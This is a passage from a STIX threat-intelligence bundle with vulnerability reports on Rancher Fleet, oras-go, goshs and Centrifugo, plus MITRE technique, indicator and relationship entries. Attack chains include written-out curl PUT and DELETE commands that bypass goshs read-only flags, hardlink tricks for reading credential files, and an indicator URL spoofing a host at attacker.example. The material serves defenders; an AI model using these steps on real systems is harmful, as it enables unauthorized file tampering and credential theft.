Review all JWKS documents for Centrifugo deployments to ensure that `kid` values are unique across all potential issuer/audience configurations, if dynamic JWKS is used.\n*   **Segment Multi-Tenant Environments**: Implement network and logical segmentation between tenants to limit the blast radius in case of a successful authentication bypass.\n",
      "published": "2026-07-03T12:28:16Z",
      "labels": [
        "authentication-bypass",
        "jwt",
        "jwks",
        "centrifugo",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-g6vg-wj8f-48cj"
        }
      ],
      "confidence": 95
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--270ac1d5-7336-5ec3-948e-f6473a5d8c06",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Fleet PSS Bypass Vulnerability (CVE-2026-44938) via addLabelsFromOptions",
      "description": "## Overview\n\nA high-severity vulnerability, CVE-2026-44938, has been discovered in the Fleet agent's deployer component. This flaw allows an attacker who has gained `git push` access to a Fleet-monitored repository to manipulate Pod Security Standards (PSS) enforcement labels. Specifically, the `addLabelsFromOptions` function within the agent fails to properly filter security-sensitive `pod-security.kubernetes.io/` prefixed labels from `namespaceLabels` defined in `fleet.yaml` or `BundleDeployment.spec.options.namespaceLabels`. This oversight permits an attacker to overwrite and effectively downgrade PSS policies on a target Kubernetes namespace, thereby weakening admission controls and enabling the deployment of malicious or privileged workloads that would normally be blocked. The vulnerability impacts various versions of Fleet, including `0.15.0` to `0.15.1`, `0.14.0` to `0.14.5`, `0.13.0` to `0.13.10`, and `0.12.0` to `0.12.14`. This presents a significant risk to Kubernetes cluster integrity, as it can be leveraged to bypass critical security mechanisms.\n\n## Attack Chain\n\n1.  **Initial Access (Git Repository)**: Attacker gains `git push` access to a Fleet-monitored Git repository, potentially via compromised developer credentials or an insider threat.\n2.  **Configuration Modification**: Attacker modifies the `fleet.yaml` file (or `BundleDeployment.spec.options.namespaceLabels`) within the compromised repository to include or modify `namespaceLabels` that override or downgrade existing Pod Security Standards.\n3.  **Code Commit and Push**: The malicious configuration change is committed and pushed to the Fleet-monitored Git repository.\n4.  **Fleet Agent Deployment**: The Fleet agent, observing changes in the Git repository, pulls the updated `fleet.yaml` and attempts to apply the `namespaceLabels` to the target Kubernetes namespace.\n5.  **PSS Label Overwrite**: Due to CVE-2026-44938, the Fleet agent fails to filter security-sensitive `pod-security.kubernetes.io/` labels, inadvertently overwriting legitimate PSS enforcement labels on the target namespace.\n6.  **Admission Control Weakening**: The target Kubernetes namespace's Pod Security Standard admission controls are effectively downgraded or disabled, allowing higher-privileged workloads to be deployed.\n7.  **Malicious Workload Deployment**: The attacker then deploys a malicious or privileged Kubernetes workload (e.g., a container running as root, with hostPath mounts, or network access) to the now-weakened namespace.\n8.  **Impact**: The deployed malicious workload executes, leading to potential confidentiality breaches (data exfiltration), integrity compromises (system modification), or availability issues (resource consumption, denial of service) within the Kubernetes cluster.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-44938 allows an attacker to bypass Kubernetes Pod Security Standards (PSS) enforcement on affected namespaces, leading to weakened admission controls. This enables the deployment of privileged or otherwise restricted workloads, which can then be leveraged for unauthorized data exfiltration, system compromise, or disruption of services within the Kubernetes cluster. The ultimate impact on confidentiality, integrity, and availability depends on the specific permissions and actions of the attacker-deployed workload. While no specific victim counts are provided, any organization utilizing vulnerable Fleet versions in a multi-tenant or multi-developer environment where `git push` access could be compromised is at risk.\n\n## Recommendation\n\n*   **Patch Immediately**: Upgrade your Fleet deployments to a patched version (v0.15.2, v0.14.6, v0.13.11, or v0.12.15) to mitigate CVE-2026-44938.\n*   **Implement NeuVector Workaround**: If immediate patching is not possible, deploy NeuVector (SUSE Security) and configure an admission control Deny rule for \"Run as privileged\" in Protect mode. NeuVector evaluates pod specs independently of Kubernetes PSS namespace labels, blocking privileged containers even if PSS labels are downgraded due to CVE-2026-44938.\n*   **Restrict Repository Access**: Implement strict access controls for Git repositories monitored by Fleet, particularly in multi-tenant environments, to reduce the attack surface for CVE-2026-44938.\n*   **Review Credentials**: Review your systems for potentially leaked credentials and replace any that may be compromised, as `git push` access is a prerequisite for exploiting CVE-2026-44938.\n",
      "published": "2026-07-03T12:27:12Z",
      "labels": [
        "kubernetes",
        "fleet",
        "pss-bypass",
        "admission-controller",
        "supply-chain",
        "defense-evasion"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-864g-863m-vcvq"
        },
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1685/"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-44938"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d93e43bb-0ef6-5240-99ae-b5c3843782e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cec9b4bf-a6e0-5fee-9771-e2432647eeb0",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cec9b4bf-a6e0-5fee-9771-e2432647eeb0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Rancher Fleet Unauthenticated Webhook Regex Injection (CVE-2026-44937)",
      "description": "## Overview\n\nA high-severity vulnerability, CVE-2026-44937, has been identified in Rancher Fleet, a GitOps at Scale project. When the webhook endpoint of Fleet is configured without a secret, an unauthenticated attacker can forge webhook requests. This allows the attacker to leverage a regex injection vulnerability via unsanitized repository URL components. Exploitation can lead to continuous repository re-cloning, causing significant network traffic and depleting resources on the management cluster, effectively resulting in a Denial of Service. Additionally, attackers with read access to the target Git repository can force a downgrade of running services to any historical revision. This vulnerability impacts Fleet versions prior to v0.15.2, v0.14.6, 0.13.11, and v0.12.15. The issue was reported by Radisauskas Arnoldas from NATO Cyber Security Centre.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a Rancher Fleet instance with its webhook endpoint accessible and configured without a shared secret.\n2. The attacker crafts a malicious HTTP POST request targeting the Fleet webhook endpoint, such as `/webhook`.\n3. Within the request, the attacker injects regular expression patterns into the repository URL components, exploiting the unsanitized input vulnerability (CVE-2026-44937).\n4. Fleet receives and processes the forged webhook request, attempting to interpret the malicious regex as a legitimate repository reference.\n5. This misinterpretation causes Fleet to initiate continuous, erroneous attempts to re-clone the specified (attacker-controlled or non-existent) repository.\n6. The constant re-cloning operations consume excessive network bandwidth and compute resources on the management cluster, leading to a Denial of Service state.\n7. If the attacker also has read access to the legitimate target Git repository, they can specify a historical revision via the regex injection to force a service downgrade.\n\n## Impact\n\nThis vulnerability allows an unauthenticated attacker to cause significant operational disruption. The primary impact is a Denial of Service (DoS) due to continuous repository re-cloning, which exhausts network resources and compute capacity on the management cluster. This can halt or severely degrade the normal operation of deployed applications and infrastructure managed by Fleet. A secondary impact, conditional on the attacker having read access to the target Git repository, is the ability to force running services to downgrade to any historical revision, potentially introducing older, vulnerable, or non-functional code. The full scope of victims is not specified, but any organization utilizing vulnerable Rancher Fleet configurations is at risk.\n\n## Recommendation\n\n*   Upgrade Rancher Fleet to a patched version (v0.15.2, v0.14.6, 0.13.11, or v0.12.15) to address CVE-2026-44937 immediately.\n*   Implement the workaround by ensuring all Fleet webhooks are configured with a shared secret to prevent unauthenticated access.\n",
      "published": "2026-07-03T12:26:19Z",
      "labels": [
        "rancher",
        "fleet",
        "vulnerability",
        "webhook",
        "regex-injection",
        "denial-of-service",
        "cloud-native",
        "kubernetes",
        "supply-chain"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-jmf4-m7j9-g72r"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bf00b683-f5a0-55da-8732-0099ae2159a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_sha256: 040e140304b7dbdd9b40dacd798e2303cea44ad84eeb210750afdf15f1dcf8b4",
      "pattern": "[file:hashes.'SHA-256' = '040e140304b7dbdd9b40dacd798e2303cea44ad84eeb210750afdf15f1dcf8b4']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T12:25:05Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--600be39f-42cd-51a2-bf51-6863c84cae43",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "target_ref": "indicator--bf00b683-f5a0-55da-8732-0099ae2159a0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--378e2e22-1140-59ee-a799-91d4cf0fed37",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/oras-project/oras/releases/download/v1.3.0/oras_1.3.0_linux_amd64.tar.gz",
      "pattern": "[url:value = 'https://github.com/oras-project/oras/releases/download/v1.3.0/oras_1.3.0_linux_amd64.tar.gz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T12:25:05Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b98f552-5396-5501-b7b1-e4fe58b03093",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "target_ref": "indicator--378e2e22-1140-59ee-a799-91d4cf0fed37"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6a7690b0-165b-522e-9d06-3e708b7ac235",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: oras.land",
      "pattern": "[domain-name:value = 'oras.land']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T12:25:05Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e993e3a1-e4ba-59c6-a1ef-04f1633e6b9f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "target_ref": "indicator--6a7690b0-165b-522e-9d06-3e708b7ac235"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--73b46932-4d53-5de1-ab03-3e0690ca1e54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--931503ec-1833-5370-92a1-684d44db2f54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fec5a3c5-3f91-5d12-9f27-474540c50d79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Alternative Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1048",
          "url": "https://attack.mitre.org/techniques/T1048"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--22457a77-027a-5c34-a685-59e826aa366c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "target_ref": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e856872f-6856-5411-9539-709e1a2dd591",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bf4068b1-3409-5b2d-9e0e-d0cea6b3d605",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Oras-Go Tar Extraction Vulnerability Allows Current Working Directory Escape (CVE-2026-50163)",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-50163) has been identified in `oras-go/v2` versions \u003c= 2.6.1, including the `oras` CLI tool, that allows for arbitrary file reading and modification during OCI artifact extraction. An attacker can exploit this by crafting a malicious OCI artifact with a tarball layer containing a hardlink entry whose target is a relative path (e.g., `victim.secret`). When a victim uses `oras pull` or any Go application leveraging the vulnerable `oras-go/v2/content/file` package to extract this artifact, a flaw in the `ensureLinkPath` function causes the `os.Link` system call to resolve the relative hardlink target against the invoking process's current working directory (CWD) instead of the intended artifact extraction base. This enables the creation of a hardlink within the extraction directory that points to a sensitive file in the victim's CWD, allowing attackers to exfiltrate or tamper with files like `.env`, `.git/config`, or cloud credentials. The impact is elevated to critical if the `oras pull` operation is executed with root privileges, granting access to virtually any file on the host system.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious OCI artifact layer containing a hardlink entry (`Typeflag=TypeLink`, `Linkname=\"victim.secret\"`, where `victim.secret` is a relative path). The layer is specifically annotated for auto-extraction (`io.deis.oras.content.unpack: \"true\"`).\n2.  The malicious artifact is published to an OCI-compliant registry controlled by the attacker or a compromised one.\n3.  A victim executes `oras pull` (or any Go code using `oras-go/v2/content/file`) to retrieve the artifact, with their current working directory (CWD) containing a sensitive file named `victim.secret`.\n4.  During extraction, `oras-go`'s `ensureLinkPath` function validates the hardlink. Due to a logic flaw, it incorrectly returns the original relative `Linkname` (`victim.secret`), despite internally resolving a safe absolute path for validation.\n5.  The `os.Link` system call is then invoked with this relative `victim.secret` as the `oldname` parameter. Instead of resolving relative to the extraction base, `os.Link` resolves it against the process's CWD.\n6.  A hardlink is created inside the victim's artifact extraction directory (e.g., `extract/payload.tar.gz/evil_cwd_link`), pointing to the sensitive `victim.secret` file located in the victim's CWD.\n7.  The attacker, by subsequently accessing the extracted artifact (e.g., reading the `evil_cwd_link` file), can now read the contents of the sensitive `victim.secret` file from the victim's CWD or modify its contents through the shared inode.\n\n## Impact\n\nThis vulnerability presents an arbitrary file read primitive, allowing an attacker to access sensitive files from the victim's current working directory (CWD). If `oras pull` is run by a regular user, files like `.env`, `.git/config`, `.aws/credentials`, SSH configurations, project-local secrets, or CI workspace files are at risk. In high-severity scenarios, such as when `oras pull` is run as root (e.g., within Kubernetes operators, systemd services without `User=` isolation, or container entrypoints), the attacker gains the ability to read or tamper with virtually any file on the host filesystem, including `/etc/shadow`, `/root/.ssh/id_rsa`, or bind-mounted host paths, making it a critical threat to CI pipelines, container orchestration, and multi-tenant environments. The PoC demonstrated successful inode sharing on Ubuntu 24.04.4 LTS, confirming the ability to access CWD files through the created hardlink.\n\n## Recommendation\n\n*   **Patch CVE-2026-50163 immediately:** Upgrade `oras-go/v2` to a version greater than 2.6.1. For `oras` CLI users, upgrade to the latest patched version when available.\n*   **Implement `fs.protected_hardlinks`:** Ensure `fs.protected_hardlinks=1` is enabled on Linux systems. While not a full fix for user-owned files, this mitigates unauthorized hardlinking of root-owned files when the victim process runs as a regular user.\n*   **Minimize `oras pull` CWD exposure:** Restrict the environment where `oras pull` or `oras-go` library calls are executed. Do not run `oras pull` from directories containing sensitive files.\n*   **Limit `oras pull` privileges:** Avoid running `oras pull` as a privileged user (e.g., `root`) in production or CI/CD environments. Utilize user namespaces, unprivileged containers, or `User=` directives in systemd where applicable.\n",
      "published": "2026-07-03T12:25:05Z",
      "labels": [
        "vulnerability",
        "supply-chain",
        "go",
        "linux",
        "tar",
        "hardlink",
        "path-traversal",
        "arbitrary-file-read",
        "code-execution"
      ],
      "object_refs": [
        "indicator--bf00b683-f5a0-55da-8732-0099ae2159a0",
        "indicator--378e2e22-1140-59ee-a799-91d4cf0fed37",
        "indicator--6a7690b0-165b-522e-9d06-3e708b7ac235",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
        "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-fxhp-mv3v-67qp"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b04c39a-008b-5e85-8ac6-15beb0cf53bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c10ffb6a-a03d-5fbc-a5e8-483a149e6ece",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d21a692-6f6e-5bb7-83dc-e2bc0f788d04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Staged",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1074",
          "url": "https://attack.mitre.org/techniques/T1074"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5abaa05b-a4d8-5db0-9135-667baa95c8ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c10ffb6a-a03d-5fbc-a5e8-483a149e6ece",
      "target_ref": "attack-pattern--9d21a692-6f6e-5bb7-83dc-e2bc0f788d04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--45ade0a2-ae75-5013-be17-7cde55c21128",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c10ffb6a-a03d-5fbc-a5e8-483a149e6ece",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6e6214f4-8dda-5112-977b-24385ff63ab2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c10ffb6a-a03d-5fbc-a5e8-483a149e6ece",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c10ffb6a-a03d-5fbc-a5e8-483a149e6ece",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "goshs WebDAV Listener Bypasses Access Restriction Flags",
      "description": "## Overview\n\nA significant vulnerability, tracked as CVE-2026-50138, has been identified in the `goshs` HTTP server, specifically affecting versions `\u003c= v2.0.9`. When `goshs` is configured to enable its WebDAV listener via the `-w` flag, crucial access restriction flags such as `--read-only`, `--upload-only`, and `--no-delete` are not properly enforced on the WebDAV port. This oversight allows an authenticated attacker to perform unauthorized file operations, including creating, overwriting, deleting, moving, and copying files, despite the administrator's explicit configuration to prevent such actions. Furthermore, even with `--upload-only` enabled, file contents can be retrieved via WebDAV `GET` or `PROPFIND` requests. The core issue lies in the WebDAV mux being directly wired to `golang.org/x/net/webdav.Handler` without the necessary guard logic present in the primary HTTP handler, fundamentally undermining data integrity and confidentiality assurances for affected `goshs` deployments.\n\n## Attack Chain\n\n1.  An administrator deploys `goshs` with WebDAV enabled (`-w`), a data directory (`-d`), basic authentication (`-b`), and restrictive flags like `--read-only` (`-ro`) or `--no-delete`, expecting the WebDAV share to enforce these restrictions.\n2.  The attacker gains valid credentials for the `goshs` basic authentication, either through compromise or misconfiguration.\n3.  The attacker connects to the `goshs` WebDAV port (e.g., `http://localhost:18001`) and authenticates.\n4.  Despite `goshs` being configured with `--read-only`, the attacker sends an HTTP `PUT` request to create or overwrite a file on the WebDAV share (e.g., `curl -u admin:pw -X PUT http://localhost:18001/new_file.txt --data \"malicious content\"`).\n5.  The `goshs` WebDAV handler, lacking enforcement of the `--read-only` flag, successfully processes the `PUT` request, creating or modifying `new_file.txt`.\n6.  Similarly, the attacker sends an HTTP `DELETE` request to remove an existing file (e.g., `curl -u admin:pw -X DELETE http://localhost:18001/sensitive_data.txt`).\n7.  The WebDAV handler bypasses the `--no-delete` flag, successfully deleting `sensitive_data.txt`.\n8.  The attacker can further exfiltrate data by sending HTTP `GET` or `PROPFIND` requests, even if `--upload-only` was configured, revealing sensitive file contents.\n\n## Impact\n\nThe vulnerability in `goshs` allows a complete bypass of intended access restrictions, leading to severe consequences for data integrity and confidentiality. Any operator utilizing `goshs` with WebDAV enabled and relying on flags like `--read-only` or `--no-delete` to protect sensitive directories from modification or deletion will find their data exposed. This can result in unauthorized data alteration, complete deletion of files, creation of malicious content, and unauthorized disclosure of confidential information. While no specific victim counts are provided, any organization using `goshs` up to version `v2.0.9` for sharing sensitive files in a restricted manner, especially as a \"read-only\" artifact delivery mechanism, is directly at risk.\n\n## Recommendation\n\n*   **Patch CVE-2026-50138 immediately**: Upgrade `goshs` to a version greater than `v2.0.9` once a fix is released.\n*   **Review `goshs` deployments**: Operators running `goshs` with WebDAV enabled (`-w`) should re-evaluate their security posture, especially if relying on `--read-only`, `--upload-only`, or `--no-delete` flags.\n*   **Implement network segmentation**: For `goshs` instances serving WebDAV, restrict network access to the WebDAV port to only trusted internal networks or specific IP addresses to limit exposure.\n*   **Disable WebDAV if not strictly necessary**: If WebDAV functionality is not a core requirement, disable it entirely to mitigate the risk of CVE-2026-50138.\n",
      "published": "2026-07-03T12:23:58Z",
      "labels": [
        "webserver",
        "misconfiguration",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--9d21a692-6f6e-5bb7-83dc-e2bc0f788d04",
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-3whc-qvhv-xqjp"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a1337c8c-6b6e-53be-98f3-f1a7862fda9a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: attacker.example",
      "pattern": "[domain-name:value = 'attacker.example']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T12:22:45Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4abce7d-f865-55eb-b462-0946203e514f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2a9dc048-e8be-5766-a428-d1fa4524cb02",
      "target_ref": "indicator--a1337c8c-6b6e-53be-98f3-f1a7862fda9a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f798060f-e677-5a1a-8861-e08096dc6e1b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://real-actor-id.apify.actor@attacker.example/mcp",
      "pattern": "[url:value = 'https://real-actor-id.apify.actor@attacker.example/mcp']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T12:22:45Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b9b847c-2a5b-5e7a-ae26-21bce5bd3fce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2a9dc048-e8be-5766-a428-d1fa4524cb02",
      "target_ref": "indicator--f798060f-e677-5a1a-8861-e08096dc6e1b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--731fbecb-c13c-5668-b086-6e5b1ffbae61",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2a9dc048-e8be-5766-a428-d1fa4524cb02",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--323fe7ae-a0b6-5168-a3fa-baa60574bd96",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
